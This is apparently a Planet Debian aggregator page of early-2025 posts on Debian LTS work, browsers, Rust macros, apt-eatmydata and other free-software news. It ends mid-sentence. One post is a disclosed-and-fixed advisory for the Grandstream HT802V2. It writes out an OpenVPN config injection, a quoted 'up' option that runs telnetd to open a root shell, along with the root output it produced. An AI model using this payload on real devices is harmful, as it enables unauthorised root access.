Search Results: "ms"

14 February 2025

Jonathan Dowland: printables.com feed

I wanted to follow new content posted to Printables.com with a feed reader, but Printables.com doesn't provide one. Neither do the other obvious 3d model catalogues. So, I started building one. I have something that spits out an Atom feed and a couple of beta testers gave me some valuable feedback. I had planned to make it public, with the ultimate goal being to convince Printables.com to implement feeds themselves. Meanwhile, I stumbled across someone else who has done basically the same thing. Here are 3rd party feeds for The format of their feeds is JSON-Feed, which is new to me. FreshRSS and NetNewsWire seems happy with it. (I went with Atom.) I may still release my take, if I find time to make one improvmment that my beta-testers suggested.

Freexian Collaborators: Monthly report about Debian Long Term Support, January 2025 (by Roberto C. S nchez)

Like each month, have a look at the work funded by Freexian s Debian LTS offering.

Debian LTS contributors In January, 20 contributors have been paid to work on Debian LTS, their reports are available:
  • Abhijith PA did 8.0h (out of 14.0h assigned), thus carrying over 6.0h to the next month.
  • Adrian Bunk did 36.5h (out of 47.75h assigned and 52.25h from previous period), thus carrying over 63.5h to the next month.
  • Andrej Shadura did 11.0h (out of 11.0h assigned and 4.0h from previous period), thus carrying over 4.0h to the next month.
  • Arturo Borrero Gonzalez did 9.0h (out of 10.0h assigned), thus carrying over 1.0h to the next month.
  • Bastien Roucari s did 22.0h (out of 22.0h assigned).
  • Ben Hutchings did 8.0h (out of 21.0h assigned and 3.0h from previous period), thus carrying over 16.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 20.0h (out of 23.0h assigned and 3.0h from previous period), thus carrying over 6.0h to the next month.
  • Emilio Pozuelo Monfort did 34.0h (out of 7.0h assigned and 27.75h from previous period), thus carrying over 0.75h to the next month.
  • Guilhem Moulin did 3.25h (out of 20.0h assigned), thus carrying over 16.75h to the next month.
  • Jochen Sprickerhof did 23.0h (out of 15.0h assigned and 8.0h from previous period).
  • Lee Garrett did 15.75h (out of 8.5h assigned and 51.5h from previous period), thus carrying over 44.25h to the next month.
  • Lucas Kanashiro did 8.0h (out of 32.0h assigned and 32.0h from previous period), thus carrying over 56.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. S nchez did 14.75h (out of 13.5h assigned and 10.5h from previous period), thus carrying over 9.25h to the next month.
  • Santiago Ruano Rinc n did 21.75h (out of 18.75h assigned and 6.25h from previous period), thus carrying over 3.25h to the next month.
  • Sean Whitton did 8.5h (out of 8.5h assigned).
  • Sylvain Beucler did 10.5h (out of 0.0h assigned and 49.5h from previous period), thus carrying over 39.0h to the next month.
  • Thorsten Alteholz did 11.0h (out of 11.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).

Evolution of the situation In January, we have released 33 DLAs. There were numerous security and non-security updates to Debian 11 (codename bullseye ) during January.
  • Notable security updates:
    • rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
    • tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
    • ruby2.7, prepared by Bastien Roucari s, fixed several CVEs (including denial of service vulnerabilities)
    • tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL ptr, buffer overflow, use-after-free, and segfault vulnerabilities)
  • Notable non-security updates:
    • linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the bullseye-backports suite)
    • debian-security-support, prepared by Santiago Ruano Rinc n, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk
In addition to the security and non-security updates targeting bullseye , various LTS contributors have prepared uploads targeting Debian 12 (codename bookworm ) with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucari s prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rinc n also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago s work on identifying and tracking similar issues, underscore the LTS Team s commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release. LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rinc n prepared an upload of openjpeg2 for Debian unstable (codename sid ), as part of the LTS Team effort to assist with package uploads to unstable.

Thanks to our sponsors Sponsors that joined recently are in bold.

13 February 2025

Russell Coker: Browser Choice

Browser Choice and Security Support Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn t an option and Chromium still has some of the Google anti-features built in. Firefox So I tried to use Firefox for the things I do. One feature of Chrome based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to allow that but I prefer to have a minimal number of addons and not have any that are just to replace deliberately broken settings in the browser. Also those addons can t set a file for the URL, so I could set a web server for it but it s annoying to have to setup a web server to work around a browser limitation. Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There s a Firefox setting for allowing web sites to autoplay but there doesn t seem to be a way to add sites to the list. Firefox is getting vertical tabs which is a really nice feature for wide displays [3]. Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust which is difficult to package and run [4]. There are Docker images for it but I prefer to avoid Docker, generally I think that Docker is a sign of failure in software development. If you can t develop software that can be deployed without Docker then you aren t developing it well. Chromium The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it s not included in Debian. Some of the changes like replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk are things that could be considered controversial. It definitely isn t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser. What Next? The Falcon browser that is part of the KDE project looks good, but QtWebEngine doesn t have security support in Debian. Would it be possible to provide security support for it? Ungoogled Chromium is available in Flatpak, so I ll test that out. But ideally it would be packaged for Debian. I ll try building a package of it and see how that goes. The Iridium Browser is another option [6], it seems similar in design to Ungoogled-Chromium but by different people.

Bits from Debian: DebConf25 Logo Contest Results

Last November, the DebConf25 Team asked the community to help design the logo for the 25th Debian Developers' Conference and the results are in! The logo contest received 23 submissions and we thank all the 295 people who took the time to participate in the survey. There were several amazing proposals, so choosing was not easy. We are pleased to announce that the winner of the logo survey is 'Tower with red Debian Swirl originating from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0. [DebConf25 Logo Contest Winner] Juliana also shared with us a bit of her motivation, creative process and inspiration when designing her logo:
The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!
Congratulations, Juliana, and thank you very much for your contribution to Debian! The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC. Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website. See you in Brest!

12 February 2025

Dirk Eddelbuettel: RcppUUID 1.2.0 on CRAN: Adding Clock-based UUIDs

The RcppUUID package on CRAN has been providing UUIDs (based on the underlying Boost library) for several years. Written by Artem Klemsov and maintained in this gitlab repo, the package is a very nice example of clean and straightforward library binding. As it had dropped off CRAN over a relatively minor issue, I descided to adopted it with the previous 1.1.2 release made quite recently. This release adds new high-resolution clock-based UUIDs accordingt to the v7 spec. Internally 100ns increments are represented. The resulting UUIDs are both unique and sortable. I added this recent example to the README.md which illustrated both the implicit ordering and uniqueness. The unit tests check this with a much larger N.
> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>
While one can revert from the UUID object to the clock object, I am not aware of a text parser so there is currently no inverse function (as ulid offers) for the character representation. The NEWS entry for the two releases follows.

Changes in version 1.2.0 (2025-02-12)
  • Time-based UUIDs, ie version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)

Changes in version 1.1.2 (2025-01-31)
  • New maintainer to resurrect package on CRAN

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block. Timeline

11 February 2025

Ian Jackson: derive-deftly 1.0.0 - Rust derive macros, the easy way

derive-deftly 1.0 is released. derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too! Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros. Programmers coming to Rust from scripting languages will appreciate derive-deftly s convenient automatic code generation, which works as a kind of compile-time introspection. Rust s two main macro systems I m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness. Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use. (Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and, multiple module inclusion via #[path=]. These are beyond the scope of this blog post.) macro_rules! macro_rules! aka pattern macros , declarative macros , or sometimes macros by example are the simpler kind of Rust macro. They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward: macro_rules! s pattern language doesn t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there s a horrible technique as a workaround.) And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! . This makes it hard to apply more than one macro to the same struct, and produces rightward drift. Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside. macro_rules also has various other weird deficiencies too specific to list here. Overall, compared to (say) the C preprocessor, it s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated. proc macros Rust s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro s implementation is Rust code, which takes the macro s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program. This approach is more similar to Common Lisp s macros than to most other programming languages macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc. This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum. But, it is a complete pain in the backside to write and maintain a proc_macro. The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code. There are build/execution environment problems. The proc_macro code can t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust. derive-deftly to the rescue derive-deftly lets you use a write a #[derive(...)] macro, driven by a data structure, without wading into any of that stuff. Your macro definition is a template in a simple syntax, with predefined $-substitutions for the various parts of the input data structure. Example Here s a real-world example from a personal project:
define_derive_deftly!  
    export UpdateWorkerReport:
    impl $ttype  
        pub fn update_worker_report(&self, wr: &mut WorkerReport)  
            $(
                $ when fmeta(worker_report) 
                wr.$fname = Some(self.$fname.clone()).into();
            )
         
     
 
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow  
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
 
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
    pub fn update_worker_report(&self, wr: &mut WorkerReport)  
        wr.status = Some(self.status.clone()).into();
        wr.info = Some(self.status.clone()).into();
     
Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible. Special-purpose derive macros are now worthwhile! Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros. The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly. Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.) In my most recent personal Rust project, I have 22 bespoke derive macros, done with with derive-deftly, and 19 macro_rules macros. derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro. Stability without stagnation derive-deftly is already highly capable, and can solve many advanced problems. It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide. But declaring it 1.0 doesn t mean that it won t improve further. Our ticket tracker has a laundry list of possible features. We ll sometimes be cautious about committing to these, so we ve added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.

comment count unavailable comments

B lint R czey: Supercharge Your Installs with apt-eatmydata: Because Who Needs Crash Safety Anyway?

APT eatmydata super cow powers
Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day!
I m thrilled to introduce apt-eatmydata, now available for Debian and all supported Ubuntu releases!

What Is apt-eatmydata? If you ve ever used libeatmydata, you know it s a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you d have to remember to wrap apt commands manually, like this:
eatmydata apt install texlive-full
But who has time for that? apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged no extra typing required.

How to Get It

Debian If you re on Debian unstable/testing (or possibly soon in stable-backports), you can install it directly with:
sudo apt install apt-eatmydata

Ubuntu Ubuntu users already enjoy faster package installation thanks to zstd-compressed packages and to switch to even higher gear I ve backported apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:
sudo add-apt-repository ppa:firebuild/apt-eatmydata
sudo apt install apt-eatmydata
And boom! Your apt install times are getting serious upgrade. Let s run some tests
# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps
apt-eatmydata just made installing Linux headers 3x faster!

But Wait, There s More!  If you re automating CI builds, there s even a GitHub Action to make your workflows faster essentially doing what apt-eatmydata does, just setting it up in less than a second! Check it out here:
 GitHub Marketplace: apt-eatmydata

Should You Use It?  Warning: apt-eatmydata is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It s an absolute game-changer. I use it on my laptop, too. So go forth and install recklessly fast!  If you run into any issues, feel free to file a bug or drop a comment. Happy hacking! (To accelerate your CI pipeline or local builds, check out Firebuild, that speeds up the builds, too!)

Freexian Collaborators: Debian Contributions: Python 3.13 as the default Python 3 version, Fixing qtpaths6 for cross compilation, sbuild support for Salsa CI, Rails 7 transition, DebConf preparations and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-01 Contributing to Debian is part of Freexian s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson The Python 3.13 as default transition has now completed. The next step is to remove Python 3.12 from the archive, which should be very straightforward, it just requires rebuilding C extension packages in no particular order. Stefano fixed some miscellaneous bugs blocking the completion of the 3.13 as default transition.

Fixing qtpaths6 for cross compilation, by Helmut Grohne While Qt5 used to use qmake to query installation properties, Qt6 is moving more and more to CMake and to ease that transition it relies on more qtpaths. Since this tool is not naturally aware of the architecture it is called for, it tends to produce results for the build architecture. Therefore, more than 100 packages were picking up a multiarch directory for the build architecture during cross builds. In collaboration with the Qt/KDE team and Sandro Knau in particular (none affiliated with Freexian), we added an architecture-specific wrapper script in the same way qmake has one for Qt5 and Qt6 already. The relevant CMake module has been updated to prefer the triplet-prefixed wrapper. As a result, most of the KDE packages now cross build on unstable ready in time for the trixie release.

/usr-move, by Helmut Grohne In December, Emil S dergren reported that a live-build was not working for him and in January, Colin Watson reported that the proposed mitigation for debian-installer-utils would practically fail. Both failures were to be attributed to a wrong understanding of implementation-defined behavior in dpkg-divert. As a result, all M18 mitigations had to be reviewed and many of them replaced. Many have been uploaded already and all instances have received updated patches. Even though dumat has been in operation for more than a year, it gained recent changes. For one thing, analysis of architectures other than amd64 was requested. Chris Hofstaedler (not affiliated with Freexian) kindly provided computing resources for repeatedly running it on the larger set. Doing so revealed various cross-architecture undeclared file conflicts in gcc, glibc, and binutils-z80, but it also revealed a previously unknown /usr-move issue in rpi.rpi-common. On top of that, dumat produced false positive diagnostics and wrongly associated Debian bugs in some cases, both of which have now been fixed. As a result, a supposedly fixed python3-sepolicy issue had to be reopened.

rebootstrap, by Helmut Grohne As much as we think of our base system as stable, it is changing a lot and the architecture cross bootstrap tooling is very sensitive to such changes requiring permanent maintenance. A problem that recently surfaced was that building a binutils cross toolchain would result in a binutils-for-host package that would not be practically installable as it would depend on a binutils-common package that was not built. This turned into an examination of binutils-common and noticing that it actually differed across architectures even though it should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut provided a patch to move gprofng bits out of binutils-common. Independently, Matthias Klose (not affiliated with Freexian) split out binutils-gold into a separate source package. As a result, binutils-common is now equal across architectures and can be marked Multi-Arch: foreign resolving the initial problem.

Salsa CI, by Santiago Ruano Rinc n Santiago continued the work about the sbuild support for Salsa CI, that was mentioned in the previous month report. The !568 merge request that created the new build image was merged, making it easier to test !569 with external projects. Santiago used a fork of the debusine repo to try the draft !569, and some issues were spotted, and part of them fixed. This is the last debusine pipeline run with the current !569: https://salsa.debian.org/santiago/debusine/-/pipelines/794233. One of the last improvements relates to how to enable projects to customize the pipeline, in an equivalent way than they currently do in the extract-source and build jobs. While this is work-in-progress, the results are rather promising. Next steps include deciding on introducing schroot support for bookworm, bookworm-security, and older releases, as they are done in the official debian buildd.

DebConf preparations, by Stefano Rivera and Santiago Ruano Rinc n DebConf will be happening in Brest, France, in July. Santiago continued the DebConf 25 organization work, looking for catering providers. Both Stefano and Santiago have been reaching out to some potential sponsors. DebConf depends on sponsors to cover the organization cost, if your company depends on Debian, please consider sponsoring DebConf. Stefano has been winding up some of the finances from previous DebConfs. Finalizing reimbursements to team members from DebConf 23, and handling some outstanding issues from DebConf 24. Stefano and the rest of the DebConf committee have been reviewing bids for DebConf 25, to select the next venue.

Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs were fixed by Lucas and the Debian Ruby team during the sprint hold in Paris during Jan 27-31. The next step is to remove support of Ruby 3.1, which is the alternative Ruby interpreter for now. Thanks to the Debian Release team for all the support, especially Emilio Pozuelo Monfort.

Rails 7 transition, by Lucas Kanashiro Rails 6 has been shipped by Debian since Bullseye, and as a WEB framework, many issues (especially security related issues) have been encountered and the maintainability of it becomes harder and harder. With that in mind, during the Debian Ruby team sprint last month, the transition to Rack 3 (an important dependency of rails containing many breaking changes) was started in Debian unstable, it is ongoing. Once it is done, the Rails 7 transition will take place, and Rails 7 should be shipped in Debian Trixie.

Miscellaneous contributions
  • Stefano improved a poor ImportError for users of the turtle module on Python 3, who haven t installed the python3-tk package.
  • Stefano updated several packages to new upstream releases.
  • Stefano added the Python extension to the re2 package, allowing for the use of the Google RE2 regular expression library as a direct replacement for the standard library re module.
  • Stefano started provisioning a new physical server for the debian.social infrastructure.
  • Carles improved simplemonitor (documentation on systemd integration, worked with upstream for fixing a bug).
  • Carles upgraded packages to new upstream versions: python-ring-doorbell and python-asyncclick.
  • Carles did po-debconf translations to Catalan: reviewed 44 packages and submitted translations to 90 packages (via salsa merge requests or bugtracker bugs).
  • Carles maintained po-debconf-manager with small fixes.
  • Rapha l worked on some outstanding DEP-14 merge request and participated in the associated discussion. The discussions have been more contentious than anticipated, somewhat exacerbated by Otto s desire to conclude fast while the required tool support is not yet there.
  • Rapha l, with the help of Philipp Kern from the DSA team, upgraded tracker.debian.org to use Django 4.2 (from bookworm-backports) which in turn enabled him to configure authentication via salsa.debian.org. It s now possible to login to tracker.debian.org with your salsa credentials!
  • Rapha l updated zim a nice desktop wiki that is very handy to organize your day-to-day digital life to the latest upstream version (0.76).
  • Helmut sent patches for 10 cross build failures.
  • Helmut continued working on a tool for memory-based concurrency limit of builds.
  • Helmut NMUed libtool, opensysusers and virtualbox.
  • Enrico tried to support Helmut in working out tricky usrmerge situations
  • Thorsten Alteholz uploaded a new upstream version of brlaser.
  • Colin Watson upgraded 33 Python packages to new upstream versions, including fixes for CVE-2024-42353, CVE-2024-47532, and CVE-2025-22153.
  • Emilio Pozuelo managed various transitions, and fixed various RC bugs (telepathy-glib, xorg, xserver-xorg-video-vesa, apitrace, mesa).
  • Anupa attended the monthly team meeting for Debian publicity team and shared the social media stats.
  • Anupa assisted Jean-Pierre Giraud in the point release announcement for Debian 12.9 and published the Micronews.
  • Anupa took part in multiple Debian publicity team discussions regarding our presence in social media platforms.

10 February 2025

Petter Reinholdtsen: Some of my 2024 free software activities

It is a while since I posted a summary of the free software and open culture activities and projects I have worked on. Here is a quick summary of the major ones from last year. I guess the biggest project of the year has been migrating orphaned packages in Debian without a version control system to have a git repository on salsa.debian.org. When I started in April around 450 the orphaned packages needed git. I've since migrated around 250 of the packages to a salsa git repository, and around 40 packages were left when I took a break. Not sure who did the around 160 conversions I was not involved in, but I am very glad I got some help on the project. I stopped partly because some of the remaining packages needed more disk space to build than I have available on my development machine, and partly because some had a strange build setup I could not figure out. I had a time budget of 20 minutes per package, if the package proved problematic and likely to take longer, I moved to another package. Might continue later, if I manage to free up some disk space. Another rather big project was the translation to Norwegian Bokm l and publishing of the first book ever published by a S mi woman, the M ter vi liv eller d d? book by Elsa Laula, with a PD0 and CC-BY license. I released it during the summer, and to my surprise it has already sold several copies. As I suck at marketing, I did not expect to sell any. A smaller, but more long term project (for more than 10 years now), and related to orphaned packages in Debian, is my project to ensure a simple way to install hardware related packages in Debian when the relevant hardware is present in a machine. It made a fairly big advance forward last year, partly because I have been poking and begging package maintainers and upstream developers to include AppStream metadata XML in their packages. I've also released a few new versions of the isenkram system with some robustness improvements. Today 127 packages in Debian provide such information, allowing isenkram-lookup to propose them. Will keep pushing until the around 35 package names currently hard coded in the isenkram package are down to zero, so only information provided by individual packages are used for this feature. As part of the work on AppStream, I have sponsored several packages into Debian where the maintainer wanted to fix the issue but lacked direct upload rights. I've also sponsored a few other packages, when approached by the maintainer. I would also like to mention two hardware related packages in particular where I have been involved, the megactl and mfi-util packages. Both work with the hardware RAID systems in several Dell PowerEdge servers, and the first one is already available in Debian (and of course, proposed by isenkram when used on the appropriate Dell server), the other is waiting for NEW processing since this autumn. I manage several such Dell servers and would like the tools needed to monitor and configure these RAID controllers to be available from within Debian out of the box. Vaguely related to hardware support in Debian, I have also been trying to find ways to help out the Debian ROCm team, to improve the support in Debian for my artificial idiocy (AI) compute node. So far only uploaded one package, helped test the initial packaging of llama.cpp and tried to figure out how to get good speech recognition like Whisper into Debian. I am still involved in the LinuxCNC project, and organised a developer gathering in Norway last summer. A new one is planned the summer of 2025. I've also helped evaluate patches and uploaded new versions of LinuxCNC into Debian. After a 10 years long break, we managed to get a new and improved upstream version of lsdvd released just before Christmas. As I use it regularly to maintain my DVD archive, I was very happy to finally get out a version supporting DVDDiscID useful for uniquely identifying DVDs. I am dreaming of a Internet service mapping DVD IDs to IMDB movie IDs, to make life as a DVD collector easier. My involvement in Norwegian archive standardisation and the free software implementation of the vendor neutral Noark 5 API continued for the entire year. I've been pushing patches into both the API and the test code for the API, participated in several editorial meetings regarding the Noark 5 Tjenestegrensesnitt specification, submitted several proposals for improvements for the same. We also organised a small seminar for Noark 5 interested people, and is organising a new seminar in a month. Part of the year was spent working on and coordinating a Norwegian Bokm l translation of the marvellous children's book Ada and Zangemann , which focus on the right to repair and control your own property, and the value of controlling the software on the devices you own. The translation is mostly complete, and is now waiting for a transformation of the project and manuscript to use Docbook XML instead of a home made semi-text based format. Great progress is being made and the new book build process is almost complete. I have also been looking at how to companies in Norway can use free software to report their accounting summaries to the Norwegian government. Several new regulations make it very hard for companies to do use free software for accounting, and I would like to change this. Found a few drafts for 